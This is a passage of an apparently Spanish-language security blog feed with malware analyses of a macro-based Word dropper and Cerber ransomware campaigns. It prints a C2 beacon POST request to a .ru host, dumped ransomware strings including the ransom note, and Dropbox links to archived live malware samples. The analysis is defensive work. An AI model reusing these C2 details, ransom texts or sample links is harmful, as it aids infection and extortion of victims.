<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4iqwGoYbyrWDRUto9RpGz-9ecVGBFSXNMcSqo3lBy46HdiGo-Dl-xamm84vBx_nKHve_GZivkC8tRcIWBxpjvK3YwnfEO0136v0WG4EhkPhYkoT0UgjBnczUE2zw47Z5E45dPnOIAqm0/s1600/vbs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4iqwGoYbyrWDRUto9RpGz-9ecVGBFSXNMcSqo3lBy46HdiGo-Dl-xamm84vBx_nKHve_GZivkC8tRcIWBxpjvK3YwnfEO0136v0WG4EhkPhYkoT0UgjBnczUE2zw47Z5E45dPnOIAqm0/s1600/vbs.jpg" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: arial, helvetica, sans-serif;">Quitamos los /***/ y obtenemos el sito de descarga http</span><br />
<span style="color: #444444; font-family: arial, helvetica, sans-serif;"><br /></span>
<span style="color: #444444; font-family: arial, helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMmqPWaE43ddj5nutfo2-ZnW5CFGObGiWcB6ZnAeaDL401lZP_B0A6fNSg0VUyCXd8Z8ZkmBRAmnapprzTBGJ_1HvSUCpZrjFz1CbzgXYc9_hBpSj-c9Xnfq1sc6MTsUnjfoa0dTswO1g/s1600/vbs3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMmqPWaE43ddj5nutfo2-ZnW5CFGObGiWcB6ZnAeaDL401lZP_B0A6fNSg0VUyCXd8Z8ZkmBRAmnapprzTBGJ_1HvSUCpZrjFz1CbzgXYc9_hBpSj-c9Xnfq1sc6MTsUnjfoa0dTswO1g/s1600/vbs3.jpg" /></a></div>
<span style="color: #444444; font-family: arial, helvetica, sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Análisis del binario descargado por la macro .doc</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">https://www.virustotal.com/es/file/eb2421b85cd190084f28ee861681e88f2bfe2f7237b6c5d780f03c2ba896d0c4/analysis/</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigLb6ZZFGfa6ZymjNkCDG8LBeZPSqTcRjJgfkRh6D_d6uc5cuW4eLG5r789OBAM_BT-2RjfNgpaKSI0KuSzXWF-yL3kACHA2pgHGnHGcUew4uzptn9IGXvdd3d4QEwMT-yu1SqXkGba88/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="622" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigLb6ZZFGfa6ZymjNkCDG8LBeZPSqTcRjJgfkRh6D_d6uc5cuW4eLG5r789OBAM_BT-2RjfNgpaKSI0KuSzXWF-yL3kACHA2pgHGnHGcUew4uzptn9IGXvdd3d4QEwMT-yu1SqXkGba88/s640/01.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Quitamos la primera capa de ofuscación del código malicioso y obtenemos una muestra "más limpia"</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJduFwHw2HoViX9ZlmlOdM6MZLmdj-6fSKYXsekalzij1KggsPamjFOWDkvm7v7sxfhbTzkgIrYywsYLUERddN7CTkqm6UHdTFCMzR4wXDV-ysyviJi8mUvhOaVrcpc6XtPOKR5AQLXlM/s1600/03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJduFwHw2HoViX9ZlmlOdM6MZLmdj-6fSKYXsekalzij1KggsPamjFOWDkvm7v7sxfhbTzkgIrYywsYLUERddN7CTkqm6UHdTFCMzR4wXDV-ysyviJi8mUvhOaVrcpc6XtPOKR5AQLXlM/s640/03.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">https://virustotal.com/es/file/8394e9f616b66070385572fa54d11bd22a7913dd9dfedac298eef5bb16640f78/analysis/1490299891/</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span id="goog_1976611851"></span><span id="goog_1976611852"></span><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b>Reporte al sitio de C&C</b></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;">"POST <b>/kin/logout.php</b> HTTP/1.1</span><br style="background-color: white; box-sizing: border-box; color: #333333; font-family: Cabin, sans-serif; font-size: 13.6px;" /><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;">Content-Type: application/x-www-form-urlencoded</span><br style="background-color: white; box-sizing: border-box; color: #333333; font-family: Cabin, sans-serif; font-size: 13.6px;" /><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;">User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)</span><br style="background-color: white; box-sizing: border-box; color: #333333; font-family: Cabin, sans-serif; font-size: 13.6px;" /><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;">Host: <b>nwefbnujngohreogojgr.ru</b></span><br style="background-color: white; box-sizing: border-box; color: #333333; font-family: Cabin, sans-serif; font-size: 13.6px;" /><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;">Content-Length: 1111</span><br style="background-color: white; box-sizing: border-box; color: #333333; font-family: Cabin, sans-serif; font-size: 13.6px;" /><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;">Cache-Control: no-cache" with no payload</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #333333; font-family: "cabin" , sans-serif; font-size: 13.6px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Esta amenaza puede ser utilizada para robar información de la PC como también controlarla remotamente, o subir un Ransomware.</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Muestra: https://www.dropbox.com/s/fic9oudzsd2lckt/BetaBot%2023-03-17.rar?dl=0</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;">Es todo por el momento @Dkavalanche 2017</span></span><br />
<div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span></span></div>
@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com1tag:blogger.com,1999:blog-4220472203730425546.post-5481383885541745612017-01-25T10:24:00.001-08:002017-01-25T10:24:30.102-08:00<span style="font-family: Arial, Helvetica, sans-serif;"><b>CERBER #Ransomware II: Attacks with Word documents with macros continue.</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Al igual que en otros casos llega por correo spam con un zip con un documento .doc</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji5JI7RV6Un-B-U_Rm6N3BSbVnqdlfaxUpXT8rYnIMfUQtKSKxVrB9FoaDetxvSoJ9RKD7o_dT_anaBdxWGdSqjhvFlUeteyhqaiio1yh7gpBAOiFVr8aSvrZ1FL53-MZDJYwG_IXuRsk/s1600/01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji5JI7RV6Un-B-U_Rm6N3BSbVnqdlfaxUpXT8rYnIMfUQtKSKxVrB9FoaDetxvSoJ9RKD7o_dT_anaBdxWGdSqjhvFlUeteyhqaiio1yh7gpBAOiFVr8aSvrZ1FL53-MZDJYwG_IXuRsk/s640/01.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">El documento tiene macros y apela a que la victima active le ejecución, cosa que muchos hacen.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRgHc10MHpLvK40bHjX8PuFekujLOe-sfAX0u853p90pU-6t_ZVBDdNS9v6CnJCIG-tZDsEfKYoM6K5ImqC2S_4mE50-BYSHJQbu6QJPRYSy5ibDX0LCaDTnTfopdTI2AeDljCTkigOkc/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRgHc10MHpLvK40bHjX8PuFekujLOe-sfAX0u853p90pU-6t_ZVBDdNS9v6CnJCIG-tZDsEfKYoM6K5ImqC2S_4mE50-BYSHJQbu6QJPRYSy5ibDX0LCaDTnTfopdTI2AeDljCTkigOkc/s640/01.jpg" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Lo curioso es que los macros funcionan en entornos de 64bits.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSCMVIskva04zlr7gxiTEXhX87QjcXzasANn-4Jr4LOCJ-lycFm_QAEPPVrghMmLBeoA_YSrWa_gtY_GlrK_mkuID1rtb6gOBXn6dgI1loaTlL4yw4xF3b_otA8w1u1x_Zrz4YW0WoJoo/s1600/macro64b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="234" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSCMVIskva04zlr7gxiTEXhX87QjcXzasANn-4Jr4LOCJ-lycFm_QAEPPVrghMmLBeoA_YSrWa_gtY_GlrK_mkuID1rtb6gOBXn6dgI1loaTlL4yw4xF3b_otA8w1u1x_Zrz4YW0WoJoo/s640/macro64b.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Aquí modifique la función para que me funcionara en mi entorno de pruebas de 32bits.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvm4mPw_w4TjKs9CVySQz3xUHbH3xyUaLN9EV5oOjI2kzV-p98WWHPCwUe1N582r36YyzrkRfJihbl4ZR6Oel-ISiqqFSX1MLuzYRXakog1F4j3XxbaeDZWk9MrLGW1pi6sM4yyqNTBhc/s1600/macro32b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvm4mPw_w4TjKs9CVySQz3xUHbH3xyUaLN9EV5oOjI2kzV-p98WWHPCwUe1N582r36YyzrkRfJihbl4ZR6Oel-ISiqqFSX1MLuzYRXakog1F4j3XxbaeDZWk9MrLGW1pi6sM4yyqNTBhc/s400/macro32b.jpg" width="400" /></a></div>
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"> Trafico de descarga del malware por la macro.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRtEVoCGDv-bcK_bBeUIO6g5jXYHDWCiamuZC5b55uINOOUnJY5W12qSGHAXliI5vWiFTvevoEGw6LcnGMZxD-wJskAViEYDe2NQBYTDy_Nabo3dAej0_1HvOPIDF1HqQWnuj-vPgKwcs/s1600/trafico.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRtEVoCGDv-bcK_bBeUIO6g5jXYHDWCiamuZC5b55uINOOUnJY5W12qSGHAXliI5vWiFTvevoEGw6LcnGMZxD-wJskAViEYDe2NQBYTDy_Nabo3dAej0_1HvOPIDF1HqQWnuj-vPgKwcs/s640/trafico.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisickPukLe1JyC7G7e80HJhrhEDz_lC30qYjJ-itWGIGed7RqHl1F6xwnc6WMwa06ruQ9jYgqZOER-cJUbyxTDKl653vHm3Qf2RL_2sfOV9IYmxxsUhh5dCAgTdgw1xQQiMa0AK_VkXgo/s1600/MAlz.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisickPukLe1JyC7G7e80HJhrhEDz_lC30qYjJ-itWGIGed7RqHl1F6xwnc6WMwa06ruQ9jYgqZOER-cJUbyxTDKl653vHm3Qf2RL_2sfOV9IYmxxsUhh5dCAgTdgw1xQQiMa0AK_VkXgo/s640/MAlz.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Luego de la infección los archivos son encriptados y se les cambia la extension por una random.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifdmeblR8EI8XBxJvMrRSA2t_pzfs5dg6zAfgjuoR6M5u8SqbQ_ERnzzoj_b3qQvEhPgO3B8T8LqhV-zmgT9yQQTW54zkRdhSUnrwgKEpFteIewX2pp854N-3dw_Cnny26JIAeOLgQnHI/s1600/extension.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifdmeblR8EI8XBxJvMrRSA2t_pzfs5dg6zAfgjuoR6M5u8SqbQ_ERnzzoj_b3qQvEhPgO3B8T8LqhV-zmgT9yQQTW54zkRdhSUnrwgKEpFteIewX2pp854N-3dw_Cnny26JIAeOLgQnHI/s640/extension.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Verificamos en el sitio id-ransomware a que familia pertenece.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRxF8DQNTjqpOtUUmdXaZB8e98X2FqAjA_e-h23PDOJkUWQM3yNpYdt2k0DS2YtV6_Ph1AjHx3e-xovOv46-gCIcezHxfMFEMHTJmNZ7A9R3Uff5aEioNYST1MsVWR6gGE75OWwwXlGTg/s1600/idransom.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="532" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRxF8DQNTjqpOtUUmdXaZB8e98X2FqAjA_e-h23PDOJkUWQM3yNpYdt2k0DS2YtV6_Ph1AjHx3e-xovOv46-gCIcezHxfMFEMHTJmNZ7A9R3Uff5aEioNYST1MsVWR6gGE75OWwwXlGTg/s640/idransom.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Aquí realizamos un dump de la muestra y en la dirección de memoria 00AB000 encontramos parte de la configuración del ransomware.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgFad7yGlqblxKEy28oyC3DKOYABSyAdw0WM4aiT7iPxE1sLT4bBwdfYr7-RjOio58NvlWR_8pVT_K5g6YyMK5We0Q9J7y8CL1WOtf91A8YnIIcsvYrkjyxDTV3795Iuun-6EYMa60ugs/s1600/dump1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgFad7yGlqblxKEy28oyC3DKOYABSyAdw0WM4aiT7iPxE1sLT4bBwdfYr7-RjOio58NvlWR_8pVT_K5g6YyMK5We0Q9J7y8CL1WOtf91A8YnIIcsvYrkjyxDTV3795Iuun-6EYMa60ugs/s640/dump1.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Strings</b></span><br />
<b><span style="font-family: Courier New, Courier, monospace;"><br /></span></b>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">91.239.24.0/23</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">11.56.22.0/27</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">17.35.12.0/27</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">01ENV9LRVl9e1BBUlRORVJfSUR9e09TfXtJU19YNjR9e0lTX0FETUlOfXtDT1VOVF9GSUxFU317U1RPUF9SRUFTT059e1NUQVRVU30=</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rsa_key_size</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">%s\%s.tmp</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">folders</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Your documents, photos, databases and other important files have been encrypted!</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CERBER_CORE_PROTECTION_MUTEX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Attention! Attention! Attention!</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\steam\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\microsoft sql server\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\office\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\onenote\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\outlook\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\office\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\word\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\onenote\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\outlook\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\thunderbird\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\powerpoint\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\the bat!\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bitcoin\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\excel\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft sql server\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\powerpoint\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\excel\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MachineGuid</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SOFTWARE\Microsoft\Cryptography</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b></b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CERBER RANSOMWARE</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> YOUR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMPORTANT FILES </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> HAVE BEEN ENCRYPTED! </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> The only way to decrypt your files is to receive </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> the private key and decryption program. </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> To receive the private key and decryption program </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> go to any decrypted folder - inside there is the special file (*HELP_HELP_HELP*) </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> with complete instructions how to decrypt your files. </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> If you cannot find any (*HELP_HELP_HELP*) file at your PC, </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> follow the instructions below: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 1. Download "Tor Browser" from https://www.torproject.org/ and install it. </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 2. In the "Tor Browser" open your personal page here: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> http://{TOR}.onion/{PC_ID} </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Note! This page is available via "Tor Browser" only. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Verifique esta muestra con <a href="http://www.mcafee.com/us/downloads/free-tools/interceptor.aspx">McAfee Interceptor</a> y bloqueo a esta amenaza.</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiEVKzUUhTUc6Dz39zgl1aGKivU20VF29Zgn0eiSCs2mwzChpq7L083nBgrBP_n9bEAsTIVf-XK9t3758o6dmC0MrAYvjsh9-T3wnrTNxZQ86ulLBN2kqutfqIgl2Dpc0jNfWiNfbImEI/s1600/MCAfee2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiEVKzUUhTUc6Dz39zgl1aGKivU20VF29Zgn0eiSCs2mwzChpq7L083nBgrBP_n9bEAsTIVf-XK9t3758o6dmC0MrAYvjsh9-T3wnrTNxZQ86ulLBN2kqutfqIgl2Dpc0jNfWiNfbImEI/s1600/MCAfee2.jpg" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Sample : https://dl.dropboxusercontent.com/u/80008916/cerber_23_01_17.rar</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">That's all for now. @Dkavalanche 2017</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche (http://www.blogger.com/profile/05803700040566483414), published 2016-12-29T09:18:00-08:00, updated 2016-12-29T12:12:55-08:00</span></div>
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">CERBER #Ransomware: New campaign with Word documents containing macros.</span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Well, I had planned to pull down the blog's shutters for this year, but no.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Let's look at this ransomware campaign, which demands a ransom for the victims' encrypted files.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Source of the received email; it has no subject.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
